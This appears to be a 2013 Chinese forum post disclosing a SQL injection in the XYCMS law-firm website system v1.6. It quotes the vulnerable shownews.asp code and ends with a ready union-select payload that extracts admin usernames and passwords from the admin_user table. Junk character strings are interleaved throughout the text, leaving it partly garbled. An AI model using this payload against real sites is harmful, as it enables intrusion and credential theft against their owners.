前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
% Q1 ~6 b* f' f# g+ f
) g4 D3 ~0 ^# b) V淫荡分割线
0 D6 B5 F- ^( B% E--------------------------------------------------------9 z5 G; c0 K7 ]% ] u& L
3 H2 q! `: U: |
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
) T% w Q2 _& ~- \8 V) [; B源码地址:http://down.chinaz.com/soft/29233.htm4 S1 b$ `2 j/ S- h: V3 {! @
$ [, l) g G4 u$ I' `
漏洞文件:shownews.asp7 `3 n! r9 R5 [4 n
漏洞代码:7-13行* h/ V4 W0 f4 g3 A& Q5 ?
7 Z, U3 v6 e! H; | f# W9 n E
. R- \; r% z$ I6 S' x1 v<%
7 \, Q# e7 ` h7 @! Y) Did=request.QueryString("id")
# j- m/ b5 P6 x5 F" P( G' `7 k' J
- p; A) Y# @% fset snews=server.createobject("adodb.recordset") $ y6 A( ~* @( g. J
exec="select * from [news] where id="&id
9 R' o, } h6 V8 b ?snews.open exec,conn,1,1
; m) B. P* Z& u) u0 ~, n5 n%>1 f( z3 j: V% M1 x
' j+ V+ t( i* t6 {
, g6 o9 e) A8 L/ X
什么过滤都没有 直造成注入
# L7 z3 C6 M8 c* {8 G4 t 7 C R* G* L4 E% r- x) z2 N
注入点:http://127.0.0.1:99/shownews.asp?id=xx& ^7 E" r* L# h$ C o) U
- m* c6 h: V/ { H# {/ G, A其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
. b0 b9 {$ C0 S4 O
$ d5 e0 `$ v; R
+ Y/ ?2 Y8 ^8 R! E9 h5 E& a1 X" j2 @! nexp: union select 1,admin,password,4,5,7 from admin_user5 b6 @: D0 p: v; E8 Z
. O+ @3 G* R9 ?. G* k1 g+ f |
发表于 2013-4-4 17:28:12
收藏
支持
反对